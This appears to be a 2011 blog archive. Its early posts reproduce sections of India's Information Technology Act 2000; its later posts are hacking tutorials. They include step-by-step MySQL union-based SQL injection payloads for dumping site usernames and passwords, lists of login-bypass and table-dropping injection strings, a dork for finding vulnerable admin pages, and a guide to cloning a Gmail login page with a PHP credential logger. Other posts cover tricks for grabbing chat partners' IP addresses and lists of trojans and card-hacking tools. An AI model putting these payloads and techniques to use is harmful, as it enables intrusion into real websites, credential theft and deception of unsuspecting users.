Saturday, May 28, 2011

Chapter- 5 ( cyber law )


Information Technology Act – 2000

14. Secure electronic record.
Where any security procedure has been applied to an electronic record at a specific point of time. then such record shall be deemed to be a secure electronic record from such point of time to the time of verification.
15. Secure digital signature.
If, by application of a security procedure agreed to by the parties concerned, it can be verified that a digital signature, at the time it was affixed, was :-
(a) unique to the subscriber affixing it;
(b) capable of identifying such subscriber;
(c) created in a manner or using a means under the exclusive control of the subscriber and is linked to the electronic record to which it relates in such a manner that if the electronic record was altered the digital signature would be invalidated, then such digital signature shall be deemed to be a secure digital signature.
16. Security procedure.
The Central Government shall for the purposes of this Act prescribe the security procedure having regard to commercial circumstances prevailing at the time when the procedure was used, including
(a) the nature of the transaction;
(b) the level of sophistication of the parties with reference to their technological capacity;
(c) the volume of similar transactions engaged in by other parties;
(d) the availability of alternatives offered to but rejected by any party;
(e) the cost of alternative procedures; and
(f) the procedures in general use for similar types of transactions or communications.

Chapter- 4 ( cyber law )


Information Technology Act – 2000
11.Attribution of electronic records.

An electronic record shall be attributed to the originator :
(a) if it was sent by the originator himself;
(b) by a person who had the authority to act on behalf of the originator in respect of that electronic record, or
(c) by an information system programmed by or on behalf of the originator to operate automatically.
12. Acknowledgment of receipt.
(1) Where the originator has not agreed with the addressee that the acknowledgment of receipt of electronic record be given in a particular form or by a particular method, an acknowledgment may be given by :
(a) any communication by the addressee, automated or otherwise, or
(b) any conduct of the addressee, sufficient to indicate to the originator that the electronic record has been received.
(2) Where the originator has stipulated that the electronic record shall be binding only on receipt of an acknowledgment of such electronic record by him, then unless acknowledgment has been so received, the electronic record shall be deemed to have been never sent by the originator.
(3) Where the originator has not stipulated that the electronic record shall be binding only on receipt of such acknowledgment, and the acknowledgment has not been received by the originator within the time specified or agreed or, if no time has been specified or agreed to within a reasonable time, then the originator may give notice to the addressee stating that no acknowledgment has been received by him and specifying a reasonable time by which the acknowledgment must be received by him and if no acknowledgment is received within the aforesaid time limit he may after giving notice to the addressee, treat the electronic record as though it has never been sent.
13. Time and place of despatch and receipt of electronic record.
(1) Save as otherwise agreed to between the originator and the addressee, the dispatch of an electronic record occurs when it enters a computer resource outside the control of the originator.
(2) Save as otherwise agreed between the originator and the addressee, the time of receipt of an electronic record shall be determined as follows, namely :
(A) If the addressee has designated a computer resource for the purpose of receiving electronic records
(i) Receipt occurs at the time when the electronic, record enters the designated computer resource; or
(ii) If the electronic record is sent to a computer resource of the addressee that is not the designated computer resource, receipt occurs at the time when the electronic record is retrieved by the addressee.
(B) If the addressee has not designated a computer resource along with specified timings, if any, receipt occurs when the electronic record enters the computer resource of the addressee.
(3) Save as otherwise agreed to between the originator and the addressee, an electronic record is deemed to be dispatched at the place where the originator has his place of business, and is deemed to be received at the place where the addressee has his place of business.
(4) The provisions of sub-section (2) shall apply notwithstanding that the place where the computer resource is located may be different from the place where the electronic record is deemed to have been received under sub-section (3).
(5) For the purposes of this section, :
· · If the originator or the addressee has more than one place of business, the principal place of business, shall be the place of business.
· · If the originator or the addressee does not have a place of business, his usual place of
residence shall be deemed to be the place of business.
· · "usual place of residence", in relation to a body corporate, means the place where it is registered.

Chapter- 3 ( cyber law )


Information Technology Act – 2000
4. Legal recognition of electronic records.
Where any law provides that information or any other matter shall be in writing or in the typewritten or printed form, then, notwithstanding anything contained in such law, such requirement shall be deemed to have been satisfied if such information or matter is :
(a) rendered or made available in an electronic form; and
(b) accessible so as to be usable for a subsequent reference.
5. Legal recognition of digital signatures.
Where any law provides that information or any other matter shall be authenticated by affixing the signature or any document shall be signed or bear the signature of any person (hence, notwithstanding anything contained in such law, such requirement shall be deemed to have been satisfied, if such information or matter is authenticated by means of digital signature affixed in such manner as may be prescribed by the Central Government.
Explanation.For the purposes of this section, "signed", with its grammatical variations and cognate expressions, shall, with reference to a person, mean affixing of his hand written signature or any mark on any document and the expression "signature" shall be construed accordingly.
6. Use of electronic records and digital signatures in Government and its agencies.
(1) Where any law provides for
(a) the filing of any application form or any other document with any office, authority, body or agency owned or controlled by the appropriate Government in a particular manner.
(b) the issue or grant of any license, permit, sanction or approval by whatever name called in a particular manner.
(c) the receipt or payment of money in a particular manner, then, notwithstanding anything contained in any other law for the time being in force, such requirement shall be deemed to have been satisfied if such filing, issue, grant, receipt or payment, as the case may be, is effected by means of such electronic form as may be prescribed by the appropriate Government.
(2) The appropriate Government may, for the purposes of sub-section (1), by rules, prescribe
(a) the manner and format in which such electronic records shall be filed, created or issued;
(b) the manner or method of payment of any fee or charges for filing, creation or issue any electronic record under clause (a).
7. Retention of electronic records.
(1) Where any law provides that documents, records or information shall be retained for any specific period, then, that requirement shall be deemed to have been satisfied if such documents, records or information are retained in the electronic form, if :

(a) The information contained therein remains accessible so as to be usable for a subsequent reference.
(b) The electronic record is retained in the format in which it was originally generated, sent or received or in a format which can be demonstrated to represent accurately the information originally generated, sent or received.
(c) The details which will facilitate the identification of the origin, destination, date and time of dispatch or receipt of such electronic record are available in the electronic record: Provided that this clause does not apply to any information which is automatically generated solely for the purpose of enabling an electronic record to be dispatched or received.
(2) Nothing in this section shall apply to any law that expressly provides for the retention of documents, records or information in the form of electronic records.
8. Publication of rule, regulation, etc., in Electronic Gazette.
Where any law provides that any rule, regulation, order, bye-law, notification or any other matter shall be published in the Official Gazette, then, such requirement shall be deemed to have been satisfied if such rule, regulation, order, bye-law, notification or any other matter is published in the Official Gazette or Electronic Gazette.
Provided that where any rule, regulation, order, bye-law, notification or any other matter is published in the Official Gazette or Electronic Gazette, the date of publication shall be deemed to be the date of the Gazette which was first published in any form.
9. Sections 6,7 and 8 not to confer right to insist document should be accepted in electronic form.
Nothing contained in sections 6, 7 & 8 shall confer a right upon any person to insist that any Ministry or Department of the Central Government or the State Government or any authority or body established by or under any law or controlled or funded by the Central or State Government should accept, issue, create, retain and preserve any document in the form of electronic records or effect any monetary transaction in the electronic form.
10.Power to make rules by Central Government in respect of digital signature.
The Central Government may, for the purposes of this Act, by rules, prescribe :-
(a) the type of digital signature;
(b) the manner and format in which the digital signature shall be affixed;
(c) the manner or procedure which facilitates identification of the person affixing the digital signature;
(d) control processes and procedures to ensure adequate integrity, security and confidentiality of electronic records or payments; and
(e) any other matter which is necessary to give legal effect to digital signatures.

Chapter- 2 ( cyber law )


Information Technology Act – 2000
3. Authentication of electronic records.
(1) Subject to the provisions of this section any subscriber may authenticate an electronic record by affixing his digital signature.
(2) The authentication of the electronic record shall be effected by the use of asymmetric crypto system and hash function which envelop and transform the initial electronic record into another electronic record.
Explanation: – For the purposes of this sub-section, "hash function" means an algorithm mapping or translation of one sequence of bits into another, generally smaller, set known as "hash result" such that an electronic record yields the same hash result every time the algorithm is executed with the same electronic record as its input making it computationally infeasible.
(a) to derive or reconstruct the original electronic record from the hash result produced by the algorithm;
(b) that two electronic records can produce the same hash result using the algorithm.
(3) Any person by the use of a public key of the subscriber can verify the electronic record.
(4) The private key and the public key are unique to the subscriber and constitute a functioning key pair.

Chapter- 1 ( cyber law )


Information Technology Act – 2000
(Legislative Department)
New Delhi, the 9th June, 2000 / Jyaistha 19,1922 (Saka)
The following Act of Parliament received the assent of the President on the 9th June, 2000, and is hereby published for general information :-
[9th June, 2000]
An Act to provide legal recognition for transactions carried out by means of electronic data interchange and other means of electronic communication, commonly referred to as "electronic commerce", which involve the use of alternatives to paper-based methods of communication and storage of information, to facilitate electronic filing of documents with the Government agencies and further to amend the Indian Penal Code, The Indian Evidence Act, 1872, The Bankers’ Books (Evidence Act, 1891 and the Reserve Bank of India Act) 1934 and for matters connected therewith or incidental thereto.
Where as the General Assembly of the United Nations by resolution A/ RES/ 51/ 162, dated the 30th January, 1997 has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law and whereas the said resolution recommends inter alias that all States give favorable consideration to the said Model Law when they enact or revise their laws, in view of the need for uniformity of the law applicable to alternatives to paper-based methods of communication and storage of information and whereas it is considered necessary to give effect to the said resolution and to promote efficient delivery of Government services by means of reliable electronic
Section 1. Short title, extent, commencement and application
(1)This Act may be called the Information Technology Act, 2000.
(2 It shall extend to the whole of India and, save as otherwise provided in this Act, it applies also to any offence or contravention there under committed outside India by any person.
(3) It shall come into force on such date as the Central Government may, by notification, appoint and different dates may be appointed for different provisions of this Act and any reference in any such provision to the commencement of this Act shall be construed as a reference to the commencement of that provision.
(4) Nothing in this Act shall apply to,
(a) a negotiable instrument as defined in section 13 of the Negotiable Instruments Act,1881.
(b) a power-of-attorney as defined in section 1A of the Powers-of-Attorney Act, 1882.
(c) a trust as defined in section 3 of the Indian Trusts Act, 1882.
(d) a will as defined in clause (h) of section 2 of the Indian Succession Act,1925 including any other testamentary disposition by whatever name called.
(e) any contract for the sale or conveyance of immovable property or any interest in such property;
(f) any such class of documents or transactions as may be notified by the Central Government in the Official Gazette.
Section 2. Definitions;
(1) In this Act, unless the context otherwise requires,
(A) "access" with its grammatical variations and cognate expressions means gaining entry into, instructing or communicating with the logical, arithmetical, or memory function resources of a computer, computer system or computer network.
(B) "addressee" means a person who is intended by the originator to receive the electronic record but does not include any intermediary.
(C) "adjudicating officer" means an adjudicating officer appointed under subsection (1) of section 46;
(D) "affixing digital signature" with its grammatical variations and cognate expressions means adoption of any methodology or procedure by a person for the purpose of authenticating an electronic record by means of digital signature;
(E) "appropriate Government" means as respects any matter,:-
(1) Enumerated in List II of the Seventh Schedule to the Constitution.
(2) Relating to any State law enacted under List III of the Seventh Schedule to the Constitution, the State Government and in any other case, the Central Government.
(F) "asymmetric crypto system" means a system of a secure key pair consisting of a private key for creating a digital signature and a public key to verify the digital signature.
(G) "Certifying Authority" means a person who has been granted a license to issue a Digital Signature Certificate under section 24.
(H) "certification practice statement" means a statement issued by a Certifying Authority to specify the practices that the Certifying Authority employs in issuing Digital Signature Certificates.
(I) "computer" means any electronic magnetic, optical or other high-speed data processing device or system which performs logical, arithmetic, and memory functions by manipulations of electronic, magnetic or optical impulses, and includes all input, output, processing, storage, computer software, or communication facilities which are connected or related to the computer in a computer system or computer network.
(J) "computer network" means the interconnection of one or more computers through :-
(1) the use of satellite, microwave, terrestrial line or other communication media, and,
(2) terminals or a complex consisting of two or more interconnected computers whether or not the interconnection is continuously maintained.
(K) "computer resource" means computer, computer system, computer network, data, computer data base or software.
(L) "computer system" means a device or collection of devices, including input and output support devices and excluding calculators which are not programmable and capable of being used in conjunction with external files, which contain computer programs, electronic instructions, input data and output data, that performs logic, arithmetic, data storage and retrieval, communication control and other functions.
(M) "Controller" means the Controller of Certifying Authorities appointed under sub-section (l) of section 17.
(N) "Cyber Appellate Tribunal" means the Cyber Regulations Appellate Tribunal established under sub-section (1) of section 48.
(O) "data" means a representation of information, knowledge, facts, concepts or instructions which are being prepared or have been prepared in a formalised manner, and is intended to be processed is being processed or has been processed in a computer system or computer network, and may be in any form (including computer printouts magnetic or optical storage media, punched cards, punched tapes) or stored internally in the memory of the computer.
(P) "digital signature" means authentication of any electronic record by a subscriber by means of an electronic method or procedure in accordance with the provisions of section 3.
(Q) "Digital Signature Certificate" means a Digital Signature Certificate issued under sub-section (4) of section 35.
(R) "electronic form" with reference to information means any information generated, sent, received or stored in media, magnetic, optical, computer memory, micro film, computer generated micro fiche or similar device.
(S) "Electronic Gazette" means the Official Gazette published in the electronic form.
(T) "electronic record" means data, record or data generated, image or sound stored, received or sent in an electronic form or micro film or computer generated micro fiche.
(U) "function", in relation to a computer, includes logic, control arithmetical process, deletion, storage and retrieval and communication or telecommunication from or within a computer.
(V) "information" includes data, text, images, sound, voice, codes, computer programs, software and databases or micro film or computer generated micro fiche.
(W) "intermediary" with respect to any particular electronic message means any person who on behalf of another person receives, stores or transmits that message or provides any service with respect to that message.
(X) "key pair", in an asymmetric crypto system, means a private key and its mathematically related public key, which are so related that the public key can verify a digital signature created by the private key.
(Y) "law" includes any Act of Parliament or of a State Legislature, Ordinances promulgated by the President or a Governor, as the case may be. Regulations made by the President under article 240, Bills enacted as President’s Act under sub-clause (a) of clause (1) of article 357 of the Constitution and includes rules, regulations, bye-laws and orders issued or made there under.
(Z) "license" means a license granted to a Certifying Authority under section 24.
(z1) "originator" means a person who sends, generates, stores or transmits any electronic message or causes any electronic message to be sent, generated, stored or transmitted to any other person but does not include an intermediary.
(z2) "prescribed" means prescribed by rules made under this Act.
(z3) "private key" means the key of a key pair used to create a digital signature.
(z4) "public key" means the key of a key pair used to verify a digital signature and listed in the Digital Signature Certificate.
(z5) "secure system" means computer hardware, software, and procedure that
(a) Are reasonably secure from unauthorised access and misuse.
(b) Provide a reasonable level of reliability and correct operation.
(c) Are reasonably suited to performing the intended functions; and
(d) Adhere to generally accepted security procedures.
(z6) "security procedure" means the security procedure prescribed under section 16 by the Central Government.
(z7) "subscriber" means a person in whose name the Digital Signature Certificate is issued.
(z8) "verify" in relation to a digital signature, electronic record or public key, with its grammatical variations and cognate expressions means to determine whether
(a) The initial electronic record was affixed with the digital signature by the use of private key corresponding to the public key of the subscriber.
(b) The initial electronic record is retained intact or has been altered since such electronic record was so affixed with the digital signature.
(2) Any reference in this Act to any enactment or any provision thereof shall, in relation to an area in which such enactment or such provision is not in force, be construed as a reference to the corresponding law or the relevant provision of the corresponding law, if any, in force in that area.

Thursday, May 26, 2011



Ads locater 2004
historian 1.4
mui cacheview 1.00
NetworkMiner 0.87
regripper 2.02
systemreport 2.5
usb-history r1
windows file analyzer 1.0
disk investigator 1.4
live view 0.6
WinPcap 4.02


RAR Password Recovery Magic


RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.
RAR Password Recovery Magic has an easy to use interface. All you need to do to recover your password is just to add your file to the operation window.
Notice: Time needed for recovering a password with brute force depends on password length and doesn't guarantee a success.
System Requirement
  • 1. Microsoft Windows 2000/XP/2003/vista (all of the last updates installed are recommended).
  • 2. Intel or AMD or compatible processors at 1000 MHz minimum
  • 3. RAM 128 megabytes (MB).
  • 4. Minimum 700 MB of free hard disk space.
RAR Password Recovery Magic is very easy to use. To recover a password, all you need to do is just to add your file to the operation window.
Follow the steps below to recover a password for RAR file:
Step 1: Click "Open" button to open rar archive.
Step 2: Click "Setting" button to set desired parameters.

A - The set of characters available in the password. (letters only, numbers only, symbol only, letters and numbers...)
B - Select the password length (range) in "BruteForce" panel.
Step 3: Press the "Start" button to start recovery.
You can click "Cancel" button to interrupt the program at any time.
Recovering long and complex RAR passwords may take a long time due to the structure of the RAR files.

Wednesday, May 25, 2011

Protect Files Using Empathy


Empathy is a special utility allowing you to password-protect any executable file. Empathy can modify an EXE file so that it will require a password to run. Only a person knowing the password will be allowed to run the protected program. Protected files stay protected if you copy them to another location or even to another computer, no matter which operating system do they use.
Empathy allows you to protect potentially dangerous programs against running by an unauthorized person. You can use it to protect executable files in public places like schools, internet coffees or even homes.
Protected files can be run under Windows NT 3.51, Windows NT 4, Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows 95, Windows 98 and Windows Me.
Empathy is postcardware. You can use it freely for an unlimited period, but if you want to use it with all functions, you have to register it by sending me a paper postcard.

3 Hacking Games Collection Free Download


1).Where can you hack military organizations and massive businesses, empty their bank accounts and infect their systems without ever worrying about getting caught? If you didn’t guess the virtual world of games, then you need to be smacked because it says it in the title! I went out and got some of the many hacker games.

Hacker V1

This game consists of 8 missions that don’t really require any logical thinking. Every mission is pretty much the same thing but different scenario. Once you go through the first mission, you will realize that it’s not worth even attempting the rest. It wasn’t realistic and to repetitive. Not worth downloading but if you still want to here’s the link:


2).Chen Luu, the author of both this one and v1, greatly improved on this version. In this game, you are hired by a corporation to complete 12 missions. Real tools like ping, DNS, Nmap and Telnet are used in this game. The games shell was created to mimic the Unix shell so you learn some real commands. The process used to go through each mission will give you a pretty good idea of the process a hacker goes through in a real world situation. This game is worth checking out, plus it’s free.

Hacker v3.1



3).The point of this game is to complete missions and raise up in the ranks while you listen to the pretty shnazzy music in the background. It uses many programs based on real ones, so you will get a sense of some of the real methods used by hackers. The game is mostly point and click not really any command line. There are a good amount of missions that aren’t repetitive like some of the games so it should keep you occupied for a while. I actually found this game fun. I recommend trying it out.

Uplink Hacker Elite


Using Chat Find Ip Adderss & Location



2.Then Make An Account On this Site(it totally free)

3.Then They Will give You A link,The Link Will Be used To Find The IP Of Any Person

4.Then While Chatting You Can Give The Link To Any Person,And Say ThAt Its A site Cotaining
Funny jokes or Your Own Made Animation..when That Person Will Click On The Link His IP Will
recorded on your ChatRack Account

5.In Order To See The IP Of That Person You Can Simply Login To Your ChatRack Account...

Find FTP Servers


The easiest search quote is "index of ..."
Some kind of examples are:

index of ftp/ +mp3
index of ftp/ +divx
index of ftp/ +"whateveryouwant"

Google has many operators that should help you to specify your search
There are also lots of advanced operators available
here are a few:


allintitle: "index of ftp/mp3"

try to combine things and maybe u'll find something

What Is SQL injection???


SQL Injection

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.

The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:

Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:

“SELECT * FROM users WHERE password = ’” + password + “‘;”

Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:

a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):

a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:

“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –

2. ‘ group by having 1=1 –
3. ‘ group by, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.

If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks

2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer

Learn How To Hack Websites , Mysql Injection Tutorial

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.
Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:


Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: order by 1-- order by 2-- order by 3-- order by 4-- order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example: union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
or if these dont work try...

For example the url would look like: union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like: UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this: union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this: union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Phishing ?

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to and click File -> Save page as… , or simply hit + S
which does this automatically. Choose where you would like to save the web page and hit Save.

3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
?> // Marks the end of the PHP program.

5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.

6. Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

8. Save and close the file.

9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.

10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.

11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.

12. Now go take a look at your list.txt file by going through your hosting file manager or going to Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:

As you can see if you fell for this the hacker would have your email and password. Scary, eh?

How To Find The Websites Having SQL injection Vulenerability


So You Have Always Wondered That Sql Injection is such a nice approach in hacking a website but you must have not got any website that has login form having sql injection vulnerability

So heres the trick how to find one...just make a google search - "admin login.asp" (without quotes)
..Here asp stans for ACTIVE SERVER PAGES.. asp is a Program By Microsoft That uses server side scripting languages like VBscript and Running On Ms-Sql server...and the search will result the pages for administrator login having extension .asp

After reaching any login page you have to just use the traditional sql injection methods...where user name will be either admin or administrator..(since our goal is to gain admin priviledges),and in the password field you ca use the below script..
anything' OR 'x'='x
After gaining The admin Privilidges ,Just Do Whatever You want..Delete There Records,or Change the password ..etc...Thats What Hacking Is About...

Tuesday, May 24, 2011

How To Enhance uTorrent Download Speed


Lets get started. If you dont have Utorrent, Download it from here Remember to increase torrent speed please disable firewall before you use it. Now Open it up and follow these screenshots tutorial:

For connection setting I Here checked enable upnp port mapping, enable NAT-PMP port mapping and i use 45682 for random port.

Checked use additional upload slots if upload speed <90% and follow the value setting like screenshot.


Checked for enable dht network, enable dht for new torrent, enable local peer discovery, ask tracker for scrape information, enable peer change, allow incoming legacy connections and enable outgoing protocol encryption.


Setup net.max_halfopen to 90



That is it, You have just tweaked the speed of Utorrent by 80%
Remember, If the torrent has no seeds, This will not work!



[VB]stealth eye
alte susse cod
Basic Trojan Horse
Black Dream
Controla Machine
Messiah 2.0 [Private]
pasword crack
pzza cod

Learn How To Hack Websites With LFIntruder (Lfi scanner)


Hi all,
i'd like to share some of my stuff with my blog visitors.It Will Help to scan websites for Lfi(Local File Inclusion)

Dangerous Google Searching E-BOOK



Hack credit cards .......

5 software collection.....





[JAVA] Some cool Javascripts for fun

Here i will post some cool java tricks... copy the scripts in adress bar (plae where u type ) and hit enter..

This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example)

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

This code lets you edit any page/website in real-time. With Firefox, you can even edit and save the modified pages to your computer. a nice one.. i love this

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

There are times when you are not sure that the website that you are visiting is authentic. Use this code whenever in doubt :-

Copy the code from here and paste into browsers address bar..

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

hake the Browser...

How about shaking the internet browser window?

Copy paste the code on the browser's address bar and press enter...

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i) ;self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

And finally Try this one :)

Facebook Image Dance Java Script


Use this java script on ur facebook page ......


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px";*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval( 'A()',5); void(0);

Hack ip

okey guys i am new here and want to share the easiet way to get someone ip adrress.....
okey we start......

Step 1
go to the url

Step 2: Enter your email address below and click "Get Link"

Step 3: Send your friend the innocent looking link the site provide you

Step 4: When your friend, or anyone for that matter, clicks the link, a hidden script will email you their IP address

okey enjoy.......

Hacking,Sniffing,Scanning Websites

Best Hacking Websites
top 10 Password Crackers

Top Packet Sniffers

Top Scanners:-

Windows Tricks

[TRICK]Clean ur RAM by notepad

Clean Ur RAM--
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...


in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM is cleaned
Of course u can edit the code in the file for a greater "cleaning-progress".


just try it out.. it worked for me
[TRICK]How To Customise Your start Button

First you need a tool called "Resource Hacker". This free program allows you to change resources in any .exe file such as "Explorer.exe", which includes the [Start] button's Label. You can visit and search there for "Resource Hacker".
